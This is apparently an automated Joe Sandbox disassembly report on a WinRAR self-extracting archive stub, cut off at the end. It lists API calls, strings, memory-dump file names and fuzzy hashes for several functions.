Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B8EF
IsDialogMessageW.USER32(?,?), ref: 0101B902
TranslateMessage.USER32(?), ref: 0101B910
DispatchMessageW.USER32(?), ref: 0101B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0101B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0101B960
GetDlgItem.USER32(?,00000068), ref: 0101B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101B99E
SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101B9B1

Part of subcall function 0101D453: _wcslen.LIBCMT ref: 0101D47D

SetFocus.USER32(00000000), ref: 0101B9B8
_swprintf.LIBCMT ref: 0101BA24

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Part of subcall function 0101D4D4: GetDlgItem.USER32(00000068,0105FCB8), ref: 0101D4E8
Part of subcall function 0101D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0101AF07,00000001,?,?,0101B7B9,0103506C,0105FCB8,0105FCB8,00001000,00000000,00000000), ref: 0101D510
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101D51B
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101D529
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D53F
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101D559
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D59D
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101D5AB
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D5BA
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D5E1
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,010343F4), ref: 0101D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0101BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0101BA90
GetTickCount.KERNEL32 ref: 0101BAAE
_swprintf.LIBCMT ref: 0101BAC2
GetLastError.KERNEL32(?,00000011), ref: 0101BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0101BB43
_swprintf.LIBCMT ref: 0101BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0101BBD0
GetCommandLineW.KERNEL32 ref: 0101BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0101BC47
ShellExecuteExW.SHELL32(0000003C), ref: 0101BC6F
Sleep.KERNEL32(00000064), ref: 0101BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0101BCE2
CloseHandle.KERNEL32(00000000), ref: 0101BCEB
_swprintf.LIBCMT ref: 0101BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101BD7D
SetDlgItemTextW.USER32(?,00000065,010335F4), ref: 0101BD94
GetDlgItem.USER32(?,00000065), ref: 0101BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0101BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0101BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101BE68
_wcslen.LIBCMT ref: 0101BEBE
_swprintf.LIBCMT ref: 0101BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 0101BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0101BF4C
GetDlgItem.USER32(?,00000068), ref: 0101BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0101BF6B
GetDlgItem.USER32(?,00000066), ref: 0101BF85
SetWindowTextW.USER32(00000000,0104A472), ref: 0101BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0101C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0101C0BD
EnableWindow.USER32(00000000,00000000), ref: 0101C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0101C1D9

Part of subcall function 0101C73F: __EH_prolog.LIBCMT ref: 0101C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101C1FD

Strings

STARTDLG, xrefs: 0101B801
__tmp_rar_sfx_access_check_%u, xrefs: 0101BAB5
C:\Users\user\Desktop, xrefs: 0101BBC9
@, xrefs: 0101BB91
LICENSEDLG, xrefs: 0101C0B2
<, xrefs: 0101BB84
winrarsfxmappingfile.tmp, xrefs: 0101BBA6
"%s"%s, xrefs: 0101BD0D
%s, xrefs: 0101BED8
-el -s2 "-d%s" "-sp%s", xrefs: 0101BB6B

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2238251102
Opcode ID: 5bc9a691ac368b1fd32fb7c7410ba37765843430b8216a9b40215764a7f7bace
Instruction ID: 3ca8557b03994eac0f4a78719fc2f2576b3f7e2568d545669a07dc4b5598366f
Opcode Fuzzy Hash: 5bc9a691ac368b1fd32fb7c7410ba37765843430b8216a9b40215764a7f7bace
Instruction Fuzzy Hash: F242FC70944245BBFB329BA4DD49FBE7BBCAB41700F004099F6C5AA0C9CB7E9944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01010863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0101087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0101088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 010108BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01010B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01010B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 01010B93
ReadFile.KERNEL32(00000000,?,00007FFE,01033C7C,00000000), ref: 01010BB1
CloseHandle.KERNEL32(00000000), ref: 01010C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01010C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,01033C7C,?,00000000,?,00000800), ref: 01010C72
GetFileAttributesW.KERNELBASE(?,?,01033C7C,00000800,?,00000000,?,00000800), ref: 01010C9C
GetFileAttributesW.KERNEL32(?,?,01033D44,00000800), ref: 01010CD8

Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

_swprintf.LIBCMT ref: 01010D4A
_swprintf.LIBCMT ref: 01010D96

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

AllocConsole.KERNEL32 ref: 01010D9E
GetCurrentProcessId.KERNEL32 ref: 01010DA8
AttachConsole.KERNEL32(00000000), ref: 01010DAF
_wcslen.LIBCMT ref: 01010DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 01010DD5
WriteConsoleW.KERNEL32(00000000), ref: 01010DDC
Sleep.KERNEL32(00002710), ref: 01010DE7
FreeConsole.KERNEL32 ref: 01010DED
ExitProcess.KERNEL32 ref: 01010DF5

Strings

SetDllDirectoryW, xrefs: 01010888
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 01010D84
kernel32, xrefs: 01010873
dwmapi.dll, xrefs: 01010927, 01010D0D
uxtheme.dll, xrefs: 01010D17
SetDefaultDllDirectories, xrefs: 010108B9
DXGIDebug.dll, xrefs: 010108FC, 01010C5E

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 62d0e211ff2c561ae9bb3b946cd0dcc9bd5dc99431082040f53a2051b4687eef
Instruction ID: a00075720e099a0a5763cc4b07fda85e429c3e1a2598b1ee9b278207c0abeed2
Opcode Fuzzy Hash: 62d0e211ff2c561ae9bb3b946cd0dcc9bd5dc99431082040f53a2051b4687eef
Instruction Fuzzy Hash: 1ED16EB1108385AFD235AF55D888BDFBAECBBC5704F40491DF6C99E144CB398589CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0101C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0101C744

Part of subcall function 0101B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0101B3FB

_wcslen.LIBCMT ref: 0101CA0A
_wcslen.LIBCMT ref: 0101CA13
SetWindowTextW.USER32(?,?), ref: 0101CA71
_wcslen.LIBCMT ref: 0101CAB3
_wcsrchr.LIBVCRUNTIME ref: 0101CBFB
GetDlgItem.USER32(?,00000066), ref: 0101CC36
SetWindowTextW.USER32(00000000,?), ref: 0101CC46
SendMessageW.USER32(00000000,00000143,00000000,0104A472), ref: 0101CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0101CC7F

Strings

%s.%d.tmp, xrefs: 0101C940
ProgramFilesDir, xrefs: 0101CB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 0101CB1A
<br>, xrefs: 0101C9D4

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 5b0d8ffc4927b277dcd4cc9e525426b5db115e97283010b54f834d9a8797984b
Instruction ID: e6db691cefd8ca8a875add66c14126a9a7072d941056ed0adb8c4b6cead1a4d9
Opcode Fuzzy Hash: 5b0d8ffc4927b277dcd4cc9e525426b5db115e97283010b54f834d9a8797984b
Instruction Fuzzy Hash: 3BE15672940219AAEF25DBA4DD84DEF77BDAB04310F4484A5F689E7044EF78DA848F60

Uniqueness

Uniqueness Score: -1.00%

Function 0100DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0100DA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0100DAAC

Part of subcall function 0100C29A: _wcslen.LIBCMT ref: 0100C2A2

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Part of subcall function 01011B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100BAE9,00000000,?,?,?,0001042C), ref: 01011BA0

_wcslen.LIBCMT ref: 0100DDE9
__fprintf_l.LIBCMT ref: 0100DF1C

Strings

R, xrefs: 0100DC0C
RTL, xrefs: 0100DEDE
, xrefs: 0100DD6C
a, xrefs: 0100DC16
$%s:, xrefs: 0100DEFF
*messages***, xrefs: 0100DBC1
@%s:, xrefs: 0100DF06, 0100DF12
*messages***, xrefs: 0100DBFA
,, xrefs: 0100DF57

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 0a9a5e3f0f73b098baa673b409b2aa5657e5b09f552920d1d1c7f98b2d08b395
Instruction ID: 10198a46e4c69a33095d90e25fc94161ad86905a06cce3ab82b0c1cdb0c49dbe
Opcode Fuzzy Hash: 0a9a5e3f0f73b098baa673b409b2aa5657e5b09f552920d1d1c7f98b2d08b395
Instruction Fuzzy Hash: 6332F571900219DBEF66EFA8C840BEE77A5FF58300F40459AFA85AB2C1E771D985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0101D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
Part of subcall function 0101B568: IsDialogMessageW.USER32(0001042C,?), ref: 0101B59E
Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6

GetDlgItem.USER32(00000068,0105FCB8), ref: 0101D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,0101AF07,00000001,?,?,0101B7B9,0103506C,0105FCB8,0105FCB8,00001000,00000000,00000000), ref: 0101D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101D51B
SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D5E1
SendMessageW.USER32(00000000,000000C2,00000000,010343F4), ref: 0101D5F0

Strings

\, xrefs: 0101D549

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: ea5c29c5deaeae0f865de473f1f5e19640bd9c9fef6064a7ba4ad9a71192ebb7
Instruction ID: c9aa6529565a70fbb63a8f8a88daa3aff777f91894fdf6d2c519e8e4b290dabb
Opcode Fuzzy Hash: ea5c29c5deaeae0f865de473f1f5e19640bd9c9fef6064a7ba4ad9a71192ebb7
Instruction Fuzzy Hash: 2E31C171545341ABE321DF249C5AFAB7FACFB82704F00090DFAD59A194DB6A890887B6

Uniqueness

Uniqueness Score: -1.00%

Function 0101D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0101D7AE
ShellExecuteExW.SHELL32(?), ref: 0101D8DE
ShowWindow.USER32(?,00000000), ref: 0101D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 0101D959
CloseHandle.KERNEL32(?), ref: 0101D97F
ShowWindow.USER32(?,00000001), ref: 0101D9E1

Strings

.exe, xrefs: 0101D989
.inf, xrefs: 0101D89A

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 8ecd2789f0b6423568e9c909e6581cf00bc1aa696b3821e235f0f566fc83cddb
Instruction ID: c4ee4b496d4d3682530d07e2f1b62b099e617e5530fc4bf4c4aa353c1e57ac78
Opcode Fuzzy Hash: 8ecd2789f0b6423568e9c909e6581cf00bc1aa696b3821e235f0f566fc83cddb
Instruction Fuzzy Hash: 5F510770404380AAFB719FA8D448BAB7FE6AF81744F04049EFAC89B199D77DC544CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0102A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,010257FB,010257FB,?,?,?,0102ABAC,00000001,00000001,2DE85006), ref: 0102A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0102ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0102AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0102AB35
__freea.LIBCMT ref: 0102AB42

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,01024286,?,0000015D,?,?,?,?,01025762,000000FF,00000000,?,?), ref: 01028E38

__freea.LIBCMT ref: 0102AB4B
__freea.LIBCMT ref: 0102AB70

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 24e5d32516ad51ec57d5504093706978cba2de583ba533147c7d19bb386de1ac
Instruction ID: e17c86f3446af1b8c4c6623feef010b685c642ecf620bf1de52a145ebc82628d
Opcode Fuzzy Hash: 24e5d32516ad51ec57d5504093706978cba2de583ba533147c7d19bb386de1ac
Instruction Fuzzy Hash: 1B51B472700226EFEB268E68CC51EAFBBEAEB44610B154A69FD84D7542DF34DC50C650

Uniqueness

Uniqueness Score: -1.00%

Function 01023B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,01023C35,00000000,00000FA0,01062088,00000000,?,01023D60,00000004,InitializeCriticalSectionEx,01036394,InitializeCriticalSectionEx,00000000), ref: 01023C03

Strings

api-ms-, xrefs: 01023BC3

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 57f3b7bfaf38a59158e123015a40e5c39d7684aea3a4c6429c6f0a56564247df
Instruction ID: 315f4e2644b309b458b7cef3ff9711bcc3eb08a1390a7496eea3b5bbdac81b15
Opcode Fuzzy Hash: 57f3b7bfaf38a59158e123015a40e5c39d7684aea3a4c6429c6f0a56564247df
Instruction Fuzzy Hash: 7211C435A04235ABDB338E6C9C8079D77A8BB09660F110150FAD1EF284D72AE90087D0

Uniqueness

Uniqueness Score: -1.00%

Function 0101AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

OleInitialize.OLE32(00000000), ref: 0101AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101AC66
SHGetMalloc.SHELL32(01048438), ref: 0101AC70

Strings

riched20.dll, xrefs: 0101AC1E
3To, xrefs: 0101AC47

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: 0fe0dd0385b83f586036c834b8b4a59d25bbb7c93649087f95d637606c0f259e
Instruction ID: de0c2c066df0be36b2813305af08cdc1cff539e17a37911c3627e3cde9ae58f5
Opcode Fuzzy Hash: 0fe0dd0385b83f586036c834b8b4a59d25bbb7c93649087f95d637606c0f259e
Instruction Fuzzy Hash: 90F012B1D0020AABDB10AFA9D8489DFFFFCFF94700F00415AE895E6205DBB856458FA1

Uniqueness

Uniqueness Score: -1.00%

Function 010098E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,01007760,?,00000005,?,00000011), ref: 0100995F
GetLastError.KERNEL32(?,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0100996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,01007760,?,00000005,?), ref: 010099A2
GetLastError.KERNEL32(?,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010099AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010099F9

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 90714439f0d53719f423eb5ac3446cfff8c8579aad18826f0aab7c5877752a00
Instruction ID: 222b96d065fb82373c182a2d9a11c53edd2b75b0e7c213ac18208096a4d53eee
Opcode Fuzzy Hash: 90714439f0d53719f423eb5ac3446cfff8c8579aad18826f0aab7c5877752a00
